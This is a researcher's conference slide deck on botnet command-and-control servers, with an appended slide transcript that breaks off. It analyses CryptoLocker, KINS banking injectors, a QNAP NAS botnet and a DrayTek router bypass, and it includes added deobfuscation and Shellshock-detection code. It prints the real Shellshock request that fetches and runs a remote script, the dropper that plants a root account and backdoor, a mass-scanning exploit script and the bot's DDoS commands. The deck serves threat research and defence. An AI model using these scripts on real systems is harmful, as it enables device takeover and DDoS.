Senad Aruc
senad.aruc@gmail.com
www.senadaruc.com
Famous C&C servers from inside to outside.
CSE - Advanced Threats Group @ Cisco
Introduction
Senad Aruc
• Born in Macedonia
• Survived 3 wars
• First computer: Commodore-64
• First hack was free internet in 1998 using PBX call divert after 3 rings
• First public hack was the first iPhone using the Sim-Clone method, Aug. 2007
• More than 20 botnet researches and a dozen hacks, all reported and published
• Held analyst roles, then principal consultant roles focusing on SOCs, then I built some SOCs and MSSPs, and now I am working for the ATS team at Cisco, responsible for Northern Europe
• Last hack: Vodafone-Netherlands "DrayTek Vigor2132FVn" RCE vulnerability
• Is this my last hack? Of course not, I am just starting; we are just starting!
I would like to thank my wife and my two kids for their support, because all of this requires a lot of work, so I am always stealing from their time. I would also like to thank my friend Davide Cioccia.
Family and friends first
Agenda
Revealed Botnets
• Why do we still suck at malware infections
• Inside Cryptolocker C&C server
• Revealing Unique MitB Builder C&C Server
• NAS Botnet Revealed
• Kins origin malware acting like a Real E-banking web app
• Other research articles
• Vodafone-Netherlands "DrayTek Vigor2132FVn" Hack-POC details
Takeaway
• Understand how the botnets work
• Knowledge sharing
Why defense in-depth is BROKEN!
The current defense in-depth approach is built on binary detection.
Single points of inspection have their limitations: known threats are blocked, good files make it through, and unknown threats are passed to the next system.
Figure: the inspection chain NGIPS, Endpoint, WSA, ESA, ISR, NGFW, with a "?" at each stage for the unknown threat that passes through
Malware on the wire is not malware!
Malware on the wire or malware on the endpoint
Revealed Botnet’s
• Inside Cryptolocker C&C server
“CryptoLocker was a ransomware trojan which targeted computers
running Microsoft Windows and was first observed by Dell
SecureWorks in September 2013. CryptoLocker propagated via
infected email attachments, and via an existing botnet; when activated,
the malware encrypts certain types of files stored on local and
mounted network drives using RSA public-key cryptography, with the
private key stored only on the malware's control servers. The malware
then displays a message, which offers to decrypt the data if a payment
(through either Bitcoin or a pre-paid cash voucher) is made by a stated
deadline, and threatened to delete the private key if the deadline
passes. If the deadline is not met, the malware offered to decrypt data
via an online service provided by the malware's operators, for a
significantly higher price in Bitcoin” (Wikipedia)
• Infection Process
The CryptoLocker infection process starts when the Microsoft Office Word document is opened. Microsoft allows users to embed macro scripting code inside documents and gives the possibility to execute it automatically when the document is opened.
“A macro is a series of commands and
actions that help to automate some tasks -
effectively a program but usually quite short
and simple. However they are created, they
need to be executed by some system which
interprets the stored commands”
(Wikipedia)
Analyzing the documents we received through a suspicious mail, we extracted the macro inside. The macro used by the attackers to infect the machine is a Visual Basic module that is able to create new files inside the TEMP folder and download the real malware from a C&C server through an HTTP GET request. To avoid antivirus detection the malware is disguised as a .PNG image containing VB code inside.
Here is a sample taken from the original macro that shows how the malware communicates with its C&C server and how the code is obfuscated.
xwrr5e2ngn3ofo65cnfwctqt7rvvyxzu0gbdg47u8h3zgt9hcb Chr(104) & Chr(116) & Chr(116) & Chr(1xx) & Chr(x8) & Chr(4x) & Chr(47) & Chr(49) & Chr(48) & Chr(57) & Chr(46) & Chr(xx) & Chr(xx) & Chr(xx) & Chr(4x) & Chr(49) & Chr(xx) & Chr(xx) & Chr(46) & Chr(xx) & Chr(57) & Chr(xx) & Chr(9x) & Chr(x) & Chr(xx) & Chr(110) & Chr(103), Environ(Chr(1xx) & Chr(1xx) & Chr(1xx) & Chr(112)) & Chr(92) & Chr(74) & Chr(75) & Chr(87) & Chr(84) & Chr(89) & Chr(65) & Chr(68) & Chr(88) & Chr(74) & Chr(85) & Chr(77) & Chr(46) & Chr(101) & Chr(xx0) & Chr(xx1)
Many characters are obfuscated (xx) on purpose. The macro we found inside is a VB macro with many functions to hook the malware and download the real .exe from another server.
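To reverse this kind of Chr() concatenation during analysis, the following Python helper is an added example (not code from the deck or from the macro): it decodes every run of Chr(n) & Chr(n) back into a quoted literal and marks arguments redacted as xx with "?", so even the partly redacted sample above yields the URL prefix and the dropped file name. The sample line inside it is constructed after the slide's excerpt.

```python
"""Decode VBA Chr()-concatenation strings, as used by the CryptoLocker macro.

Added example, not code from the original deck. The sample line below is
constructed after the slide's excerpt, keeping its 'xx' redactions.
"""
import re

# One Chr() call; the argument is digits or a redacted token such as 1xx or x8.
CHR_RE = re.compile(r"Chr\(\s*([0-9x]+)\s*\)", re.IGNORECASE)
# A run of Chr() calls joined by VBA's '&' string concatenation operator.
RUN_RE = re.compile(
    r"Chr\(\s*[0-9x]+\s*\)(?:\s*&\s*Chr\(\s*[0-9x]+\s*\))*", re.IGNORECASE
)

# Constructed sample in the style of the slide: partly redacted with 'xx'.
SAMPLE = (
    "xwrr5e2ngn3ofo65cnfwctqt7rvvyxzu0gbdg47u8h3zgt9hcb Chr(104) & Chr(116) & "
    "Chr(116) & Chr(1xx) & Chr(x8) & Chr(4x) & Chr(47) & Chr(49) & Chr(48) & "
    "Chr(57) & Chr(46), Environ(Chr(1xx) & Chr(1xx) & Chr(1xx) & Chr(112)) & "
    "Chr(92) & Chr(74) & Chr(75) & Chr(87) & Chr(84) & Chr(89) & Chr(65) & "
    "Chr(68) & Chr(88) & Chr(74) & Chr(85) & Chr(77) & Chr(46) & Chr(101) & "
    "Chr(xx0) & Chr(xx1)"
)


def decode_chr_run(run):
    """Turn 'Chr(104) & Chr(116)' into 'ht'; redacted or invalid codes become '?'."""
    out = []
    for arg in CHR_RE.findall(run):
        # VBA Chr() takes 0..255; anything else (or an 'xx' redaction) is unknown.
        if arg.isdigit() and 0 <= int(arg) <= 255:
            out.append(chr(int(arg)))
        else:
            out.append("?")
    return "".join(out)


def deobfuscate(vba):
    """Rewrite a VBA line with every Chr() run replaced by a quoted literal."""
    return RUN_RE.sub(lambda m: '"' + decode_chr_run(m.group(0)) + '"', vba)


def extract_strings(vba, min_len=4):
    """Return the decoded runs long enough to matter (URLs, paths, file names)."""
    decoded = (decode_chr_run(m.group(0)) for m in RUN_RE.finditer(vba))
    return [s for s in decoded if len(s) >= min_len]


if __name__ == "__main__":
    # Prints the readable line and the recovered strings for the constructed sample.
    print(deobfuscate(SAMPLE))
    for s in extract_strings(SAMPLE):
        print(repr(s))
```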
The encryption algorithm used by the malware is ordinary, and the process injections are as follows:
• WINWORD.exe
  o JKWTYADXJUM.exe
• JKWTYADXJUM.exe
• explorer.exe
  o vssadmin.exe
  o iexplorer.exe
• svchost.exe
Fig 2 – Injected process
After the dropper executes the malware, the system encrypts the personal files with a public PGP key and stores the private key on the C&C server with a time bomb.
• Inside the C&C server
Templates used to build the Cryptolocker webpage
Single template pages
The functionality of the C&C server is designed to operate on autopilot. There are two main functionalities: one for the victim ("user") and one for the admin ("admin").
• Inside the C&C server
The admin can configure CryptoLocker and the settings of the C&C server with the kind of infection and the amount of money they will request from the victims. The attackers can define an INDEX landing page for specific countries with the amount of the ransom, where they can define the before and after amount.
Control panel to upload a new template
• Inside the C&C server
The configuration page for the attacker, where he can define the contact e-mail and Tor URL for the communications between the victim and the attacker. Here we can also see the payment URL and the Bitcoin wallet setup. The most important option here is the decryption key and application that the C&C will deliver to the victim after the payment.
Admin control panel to set the Bitcoin ID to receive the payments
• Inside the C&C server
Infected victims are inside the BOTS folder, where the system creates a new folder after every new phishing spread.
Every single botnet contains different folders:
• mails: targeted accounts from different countries
• smtp: stolen accounts used to spread the phishing campaign
• errs: errors generated by Cryptolocker
Botnets used by Cryptolocker
• Inside the C&C server
BOTNET number 11 contains 2.172 infected victim hostnames.
• Inside the C&C server
The mails folder contains CSV files with the email addresses used in the spam campaign.
File "GB.csv" contains 12.904 mail addresses with the full name and surname of the targeted victims. Below is an extract of the data inside every single file.
The total number of targeted victims inside BOTNET11:
• ES.csv = 2580
• GB.csv = 12.904
• IT.csv = 9.689
• NL.csv = 1.809
TOTAL = 26.982
Mail section
• Inside the C&C server
A lot of the victims didn't receive the promised unlock keys, so this is proof that it is not good to pay them, because they will never provide you the keys to unlock.
• Revealing Unique MitB Builder C&C Server
Man in the Browser Attack
We all know how easy it is to go underground and buy malware-as-a-service kits for trojans, ransomware, DDoS bots, etc. But what about a service for Man-in-the-Browser attacks against well-known electronic banking web applications, with the option to order a custom one? These injectors are the main weapon used by the bad guys against electronic banking applications where 2-factor authentication "tokens" is implemented.
The malware sample that we had an exclusive right to analyse is targeting a large financial institution located in the EU. The attack is a targeted attack with three main components.
• Malware "KINS"
  o Version: 2.0
  o First seen: 14.02.2015
  o MD5: babc53295da4cd953a1cae1e33de4910
• C&C "Zeus"
  o Configuration: hxxx://hidden.ru:80/1/uggi/binari/hy78.jpg (Config)
  o Drop-Zone: hxxx://hidden.ru:80/1/uggi/gate.php (Gate)
  o Binary: hxxx://hidden.ru:80/1/uggi/binari/bot.exe (Malware)
• MitB C&C "Blocks"
  o Base64 encoded: aHR0cHM6Ly9hiddencnkuY29tLhiddenaHA=
  o Base64 decoded: hxxs://hidden.com:443/s/g.php (Gate)
  o hxxx://hidden.com:443/s/manual.php (Russian manual for Blocks)
  o hxxx://hidden.com:443/s/center.php (C&C server for Blocks MitB)
• IOC details
• Inside MitB C&C blocks
This unique MitB builder is designed to help even an inexperienced hacker build MitB attacks just by adding and configuring blocks for every single function and step. Using this method the hacker can interact with the victim's actions in a hidden way, pushing injected commands into the browser and hiding them by manipulating CSS and JavaScript.
C&C Blocks MitB Server Login Page
MitB Server Welcome Page
1. In this section we can see the attack campaign details for each bank.
2. The second section is for online victim bots.
3. The last section is for offline victim bots.
MitB Group Builder
The edit function located in the first section is for building a MitB for the victims of that specific bank group. Here we can see the blocks for building the perfect MitB attack.
Drop-Down List Commands
The command list for every block is described in this dropdown list.
• Go – allows the victim to reach the e-banking web application
• Question – builds a custom questionnaire for the victims
• Error Question – asks a question with an error output
• Tan – JavaScript function
• Error Tan – JavaScript function
• Hold – the function for when the victim clicks the button for a transaction
• Error Login – tricks the victim into believing the login details are not correct
• Kick – kicks the victim out of the e-banking application
• Confirm – builds fake confirm messages
• Page – forwards the victim to a different page
Specific Injections per Victim
Another function of this MitB builder is custom injections for every single victim bot. Here we can see the inject functions that the attacker can build for a specific victim bot. The username and the OTP password for every single command can be seen in the info marked with the red box.
The attackers can configure the following inject functions:
• Button Text
• Command
• Parameter 1
• Parameter 3
• Style
List of the victims
The attack is alive and the number of new victims is 5-10 per day.
• Armed Qnap-NAS Botnet Revealed
The attackers are sending a GET request carrying a Shellshock exploit to IP ranges across the whole Internet. The successfully hacked NAS devices are forced to download a payload from the Internet; this payload contains an SH script with very clever design logic, specially built for QNAP NAS devices. The payload downloads the ELF Linux installer package with bot functionality for DDoS. From this point the attacker establishes persistence with an autorun.sh script inside the compromised NAS device.
Another interesting finding is that the attacker is patching the vulnerable device against the Shellshock vulnerability; by doing this the attacker prevents other hackers from owning the already hacked NAS device.
Adding a "request" user with root privileges to the "passwd" and "shadow" files is a classical approach to owning a Linux machine. The real aim of this massive hack is the script "armgH.cgi" that the attacker downloads and installs on the compromised machine.
• This CGI backdoor prepares the NAS to become an armed device ready for DDoS.
• The whole attack schematic is designed to be continuous, in autopilot mode.
• So far we managed to detect more than 500 compromised devices.
Attack chain: Massive Shellshock vulnerability attack → Deploy the payload → Patching against Shellshock (persistence) → Arming the NAS for DDoS attacks → Deploy the scanner for Shellshock attack
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://xxx.14.xx.xx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=utf-8
Content-Length: 2250
Date: Sat, 13 Dec 2014 22:09:42 GMT
Server: header">HTTP Status 404 - /cgi-bin/authLogin.cgi
Attack exploit detected by our IDS devices.
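As an added example of the detection the slide describes (not the author's IDS rules or any vendor signature), the following Python check inspects raw HTTP requests for the Shellshock function-definition prefix in the headers a CGI handler exports to Bash, tags hits against /cgi-bin/authLogin.cgi, and pulls the payload URL out as an indicator to block. The two requests inside it are constructed after the capture above, with a documentation IP in place of the redacted one.

```python
"""Flag Shellshock probes like the QNAP authLogin.cgi request above and
extract the payload URL the attacker wants the device to fetch.

Added example, not from the original deck or any IDS product. The two
requests below are constructed; 203.0.113.10 is a documentation placeholder.
"""
import re

# The Bash function-definition prefix every Shellshock payload starts with,
# "() { :; };", allowing for the whitespace variants seen in the wild.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{\s*:\s*;\s*\}\s*;")
# Any http(s) URL inside the header value: the stage-1 download location.
URL_RE = re.compile(r"https?://[^\s'\"<>]+")
# Headers a CGI server exports as environment variables, which Bash then parses.
HEADERS_TO_CHECK = ("user-agent", "referer", "cookie", "host")

# Constructed after the IDS capture on the slide.
PROBE = (
    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p "
    "/share/HDB_DATA/.../php && /usr/bin/wget -c http://203.0.113.10/S0.sh "
    "-P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1\r\n\r\n"
)
# Constructed benign request to the same CGI, to show the check does not fire on path alone.
BENIGN = (
    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n\r\n"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers) with lower-cased names."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.splitlines()
    parts = lines[0].split()
    method, path = parts[0], parts[1]
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def inspect_request(raw):
    """Return a finding for the first header carrying a Shellshock payload, else None."""
    method, path, headers = parse_request(raw)
    for name in HEADERS_TO_CHECK:
        value = headers.get(name, "")
        if SHELLSHOCK_RE.search(value):
            return {
                "method": method,
                "path": path,
                "header": name,
                # The QNAP campaign hit this exact CGI; worth its own alert tag.
                "qnap_authlogin": path.startswith("/cgi-bin/authLogin.cgi"),
                # URLs in the payload are the IoCs to block and hunt for.
                "payload_urls": URL_RE.findall(value),
            }
    return None


if __name__ == "__main__":
    print(inspect_request(PROBE))
    print(inspect_request(BENIGN))
```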
Payload - hosted on a compromised server!
#!/bin/sh
export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY
os=`uname -m`
ip=xxx.14.xx.xx
#wget -P /tmp/ http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh
#
#
fold=/share/MD0_DATA/optware/.xpl/
if [[ "$os" == 'armv5tel' ]]; then
wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
chmod 4755 /home/httpd/cgi-bin/armgH.cgi
mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi
cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi
sleep 1
Search="request"
Files="/etc/passwd"
if grep $Search $Files; then
echo "$Search user its just added!"
else
echo "request:x:0:0:request:/share/homes/admin:/bin/sh" >> /etc/passwd
echo 'request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::' >> /etc/shadow
#inst patch
wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin
#inst scan
sfolder="/share/HDB_DATA/.../"
url69="http://xxx.14.xx.79/run"
Arming the NAS devices for DDoS attacks: "armgH.cgi", hosted on a compromised server, is an ELF Linux backdoor with an IRC client and DDoS capability.
Output from the reverse-engineering analysis:
PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process
Screenshot from a hacked NAS device: the deployed payload can be controlled via the CGI web backdoor at
http://X.X.X.X:8080/cgi-bin/exo.cgi
Mass scanner for Shellshock
This script was taken from a compromised NAS device. The attacker uses the "pnscan" multi-threaded port scanner to search for and attack other vulnerable QNAP NAS devices.
#!/bin/sh
## xXx@code 3-12-2014
rand=`echo $((RANDOM%255+2))`
#url=""
url="http://1xx.xx.xx.xx/S0.sh"
download="/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 nnn"
get="GET /cgi-bin/authLogin.cgi HTTP/1.1nHost: 127.0.0.1nUser-Agent: () { :; }; $download nnn"
./pnscan -rQDoc -w"$get "-t500 -n300 $rand.0.0.0:255.0.0.0 8080 > /dev/null &
• Kins origin malware acting like a Real E-banking web app
Uncovering a C&C server used by hackers to control the infected victims. The malware analyses done on the victims' machines reveal that malware from the KINS family is targeting specific Italian bank users with ATSEngine, with the capability to dynamically inject code into the victim's browser and manage the "drops" in a fully automatic way.
• IOC
malware_family "KINS"
malware_family_version "1.0.0.5"
first_seen_timestamp "2014-05-30 15:15:01"
decrypted_config_size "20708"
decrypted_config_md5 "35bf382ea8e1e711c3d548bcfcfc54af"
encrypted_config_md5 "305edd5731692c828290705c5da279a1"
Entry RelatedBinaries "843046eb1404a49910ab433424d64c6b"
First sample details
malware_family "KINS"
malware_family_version "1.0.0.5"
first_seen_timestamp "2014-05-23 15:15:01"
decrypted_config_size "20534"
decrypted_config_md5 "0403cf8dd20db5edd762f1089df1c1ba"
encrypted_config_md5 "181d3daf422ab2ca76edefe3a4805403"
Entry RelatedBinaries "8ffe59bc277556ef8b63bf8319bd4c78"
Second sample details
entry "Dropzone" "https://37.XX.XX.XX/css/css.php"
entry "Binary" "https://37.XX.XX.XX/css/upd.exe"
Drop-Zone details
entry "Webinject" target "https://www.xxx.xx/xxxx/*"
Web-Inject details
varbname='%BOTID%';"https://XXX.com/XXX.php?q=2">
C&C-Server details
• C&C CENTER FUNCTION DETAILS
Behind the front-end, which was password protected, we saw a slightly different version of ATSEngine with the capability to automate the "drops" money transfers from the hacked victims.
• The first page is Accounts, where we can see the status of the victims ("bots") with their money balance. The statistics on the right show us the grabbed data, transferred money and logs. We also have tabs for the IP addresses, login IDs and BOT IDs of the victims.
• The second is the DROPS page, where the attacker defines the "drops": the bank accounts where the stolen money is going to be transferred. Here we can see the tabs for Drop Name, City, Country, IBAN and a memo about the transaction. The system automatically calculates the profit percentage for the person who is receiving the stolen money.
• On the Reports page we can see the logs received from the victims. This shows us that the Man-in-the-Browser attack is designed for Microsoft Internet Explorer versions 8 and 11. Here the attacker can also track the error logs with "View HTML Content" if the attack was unsuccessful, and we can see the targeted bank details.
• On the Transfers page we can see the successful "drop" transfers made by the attackers. Here we can see that they stole and transferred 1750 euro to a defined IBAN account.
• Here we can see the "Add Drop" form, where the attackers can define a new "drop" with all the requested details: Memo, IBAN, Name, Country, City, Transfer Memo, Percent of Amount, Min-Max Balance Limit, Min-Max Transfer Limit.
• Add Transfers is the killer option of this version of ATSEngine: here we can create a "TASK" that will be executed on the victim's machine in a totally hidden way, transferring the money to the predefined "Drop" account. Here we can select the victim from the list and define the date and time when the transfer will occur, with the amount of money the malware will steal from the victim.
Other research articles
• Revealing Unique MitB Builder C&C Server – Awareness publication
• NAS Botnet Revealed – Bluekaizen magazine
• Inside Cryptolocker C&C server – eForensics magazine
• Are 2 factor authentications enough to protect your money? – eForensics magazine
• Kins origin malware acting like a Real E-banking web app – Awareness publication
• Infostealer Botnet Reveal – Awareness publication
• State of ART Phishing Attack stealing 50K Credit Cards Reveal – Awareness publication
• One shot eight banks – Awareness publication
• Target List of Hesper-BOT Malware – Awareness publication
• Password cracking: proving your login. Password Cracking – Hakin9 magazine
• Time to alert Spar Kasse Bank Macedonia – Awareness disclosure
• Simple hack into web server of Customs of MK – Awareness disclosure
• Information security awareness at RM – Awareness disclosure
• I discovered a new way of Sim Carrier unlock
• Web Site Count 126 can be HACKED – Awareness disclosure
Full PDF version of my research publications: http://goo.gl/MHzIvC
Vodafone-Netherlands "DrayTek Vigor2132FVn" Hack POC details
Story…
Figure: DrayTek Vigor2132FVn in NAT mode with fiber optic Internet, behind it a Cisco Meraki MX64 with AMP+TG; the goal is the Vigor2132FVn in bridge mode with Active True IP
Vodafone forum discussions about the Active True IP and how they disabled it because of security.
Hmmm, let's play with this router.
iAlsIdx0=0&iDmzEn0=1&sDmzHst0=192.168.1.26&sDMZTpye=2&DMZHostMAC0=7C&DMZHostMAC1=01&DMZHostMAC2=91&DMZHostMAC3=53&DMZHostMAC4=A5&DMZHostMAC5=01&fid=2&iAct=1&iInetWanIdx=1&iPageIdx=1&isTrueIpDmz=1&sFormAuthStr=cbACrZnAFnZ8Zc6
MAC address of the router: 7C:01:91:53:A5:01
isTrueIpDmz=1 means True IP enabled
POST
Here we can see the script responsible for the configuration changes.
Here is the Bridge Mode: just delete the "display:none", change it from disabled to enabled, finally click OK and reboot.
Disclosure. Greetings from Vodafone.
Thanks.
This will work on all Vodafone DrayTek firmwares until 2016.
Famous C&C servers from inside to outside.

Famous C&C servers from inside to outside.

  • 1.
    Senad Aruc senad.aruc@gmail.com www.senadaruc.com Famous C&Cservers from inside to outside. CSE - Advanced Threats Group @ Cisco
  • 2.
  • 3.
    Senad Aruc • Bornin Macedonia • Survived 3 wars  • first computer Commodore-64 • first hack was free internet in 1998 using PBX call divert after 3 rings  • first public hack was first iPhone using Sim-Clone method Aug.2007 • more than 20 botnet researches and dozen of hacks all reported and published • hold analyst roles, then principal consultant roles focusing on SOC’s, then I build some SOC’s and MSSP’s and now I am working for ATS team at Cisco responsible for Northern Europe • last hack Vodafone-Netherlands "DrayTek Vigor2132FVn” RCE vulnerability • is this my last hack? Off course not, I am just starting  we are just starting!
  • 4.
    I like tothanks to my wife and my two kids for their support. Because all of this requires a lot of work, so I am always stealing from their time . Also I like to thanks to my friend Davide Cioccia. Family and friend first
  • 5.
    Agenda Revealed Botnet’s Takeaway •Why do we still suck at malware infections • Inside Cryptolocker C&C server • Revealing Unique MitB Builder C&C Server • NAS Botnet Revealed Inside Cryptolocker C&C server • Kins origin malware acting like a Real E- banking web app • Other research articles • Understand how the Bot-nets works • Vodafone-Netherlands "DrayTek Vigor2132FVn” Hack-POC details • Knowledge sharing
  • 6.
    Why defense in-depthis BROKEN! Current defense in- depth approach is built on binary detection Single points of inspection have their limitations Known threats are blocked Good files make it through NGIPS EndpointWSAESA ISRNGFW Unknown threats are passed to the next system ? ?      ? ? ? ? ? ?
  • 7.
    Malware on wireis not a malware! Malware on the wire Malware on the endpoint or
  • 8.
  • 9.
    • Inside CryptolockerC&C server “CryptoLocker was a ransomware trojan which targeted computers running Microsoft Windows and was first observed by Dell SecureWorks in September 2013. CryptoLocker propagated via infected email attachments, and via an existing botnet; when activated, the malware encrypts certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware's control servers. The malware then displays a message, which offers to decrypt the data if a payment (through either Bitcoin or a pre-paid cash voucher) is made by a stated deadline, and threatened to delete the private key if the deadline passes. If the deadline is not met, the malware offered to decrypt data via an online service provided by the malware's operators, for a significantly higher price in Bitcoin”(Wikipedia)
  • 10.
    • Infection Process TheCryptoLocker infection process start when the Microsoft Office Word is opened. Microsoft allow users to inject a macro scripting code inside documents, and give the possibility to execute it automatically when the document is opened. “A macro is a series of commands and actions that help to automate some tasks - effectively a program but usually quite short and simple. However they are created, they need to be executed by some system which interprets the stored commands” (Wikipedia) Analyzing the documents we received through a suspicious mail we extract the macro inside. The macro used by hackers to infect the machine is a Visual Basic module that is able to create new files inside the TEMP folder and download the real malware from a C&C server through an HTTP GET request. To avoid antivirus detection the malware is represented by a .PNG image containing a VB code inside.
  • 11.
    Here is asample took from the original macro that show how the malware can communicate with his C&C server and how the code is obfuscated. 1. xwrr5e2ngn3ofo65cnfwctqt7rvvyxzu0gbdg47u8h3zgt9hcb Chr(104) & Chr(116) & Chr(116) & Chr(1xx) & Chr(x8) & Chr(4x) & Chr(47) & Chr(49) & Chr(48) & Chr(57) & Chr(46) & Chr(xx) & Chr(xx) & Chr(xx) & Chr(4x) & Chr(49) & Chr(xx) & Chr(xx) & Chr(46) & Chr(xx) & Chr(57) & Chr(xx) & Chr(9x) & Chr(x) & Chr(xx) & Chr(110) & Chr(103) , Environ(Chr(1xx) & Chr(1xx) & Chr(1xx) & Chr(112)) & Chr(92) & Chr(74) & Chr(75) & Chr(87) & Chr(84) & Chr(8 9) & Chr(65) & Chr(68) & Chr(88) & Chr(74) & Chr(85) & Chr(77) & Chr(46) & Chr(101) & Chr(xx0) & Chr(xx1) Many characters are obfuscated (xx) on purpose. The macro we found inside is a VB macro with many functions to hook the malware and download the real .exe from another server. The algorithm used by the malicious encryption is ordinary and the process injections are as follows:  WINWORD.exe o JKWTYADXJUM.exe  JKWTYADXJUM.exe  explorer.exe o vssadmin.exe o iexplorer.exe  svchost.exe Fig 2 – Injected process After the dropper executes the malware the system is encrypting the personal files with public PGP key and storing the private key in the CC server with time bomb.
  • 12.
    • Inside theC&C server Templates used to build the cryptolocker webpage Single template pages The functionality of the CC server is designed to operate in autopilot. There is a two main functionality, one for the victim “user” and for the admin “admin”.
  • 13.
    • Inside theC&C server The admin can configure the CryptoLocker and the settings of the C&C server with the infection kind and amount of money they will request from the victims. The attackers can define an INDEX landing page for the specific counties with the amount of the ransom where they can define the before and after amount. Control panel to upload a new temaplate
  • 14.
    • Inside theC&C server The configuration page for the attacker where he can define the contact e-mail and tor-url for the communications between the victim and the attacker. Also we can see here the payment URL – Bit-coin wallet setups. The most important option here is the decryption key and application that C&C will deliver to the victim after the payment. Admin control panel to set the Bitcoin ID to receive the payments
  • 15.
    • Inside theC&C server Infected victims are inside the folders BOTS where the system is creating a new folder after every new spread phishing attack. Admin control panel to set the Bitcoin ID to receive the payments Every single Botnet contains different folders:  mails: targeted account from different countries  smtp: stolen account used to spread the phishing campaign  errs: errors generated by the Cryptolocker Botnets used by Cryptolocker
  • 16.
    • Inside theC&C server The BOTNET number 11 contains 2.172 infected victims hostnames. Admin control panel to set the Bitcoin ID to receive the payments
  • 17.
    • Inside theC&C server The mails folder contains “CSV” files with email addresses used in the spread spam attack. Admin control panel to set the Bitcoin ID to receive the payments File “GB.csv” contains 12.904 mail addresses with full name and surname of the targeted victims. Below an extract of the data inside every single file. The total amount of the targeted victims inside the BOTNET11: • ES.csv = 2580 • GB.csv = 12.904 • IT.csv = 9.689 • NL.csv = 1.809 TOTAL = 26.982 Mail section
  • 18.
    • Inside theC&C server A lot of the victims didn’t receive the promised unlock keys, so this is a proof that is not good to pay them a money because they will never ever provide you the keys for unlock.
  • 19.
    • Revealing UniqueMitB Builder C&C Server Man in the Browser Attack We all know how easy is to go underground and to buy a malware-as-a-service kits for trojans, ransomwares, d- dos bots etc. But what about a service for Man in the Browser attacks for well-known electronic banking web application’s and also to order a custom one. These injectors are main weapon used from bad guys for the electronic banking application where 2-factor authentication “Tokens” is implemented.
  • 20.
    The malware samplethat we had an exclusive right to analyse is targeting a large finance institution located in EU. The attack is targeted attack with three main components.  Malware “KINS” o Version: 2.0 o First seen: 14.02.2015 o MD5: babc53295da4cd953a1cae1e33de4910  C&C “Zeus” o Configuration: hxxx://hidden.ru:80/1/uggi/binari/hy78.jpg  Config o Drop-Zone: hxxx://hidden.ru:80/1/uggi/gate.php  Gate o Binary: hxxx://hidden.ru:80/1/uggi/binari/bot.exe  Malware  MitB C&C “Blocks” o Base64 encoded: aHR0cHM6Ly9hiddencnkuY29tLhiddenaHA= o Base64 decoded: hxxs://hidden.com:443/s/g.php  Gate o hxxx://hidden.com:443/s/manual.php  Russian Manual for Blocks o hxxx://hidden.com:443/s/center.php  C&C Server for Blocks MitB • IOC details
  • 21.
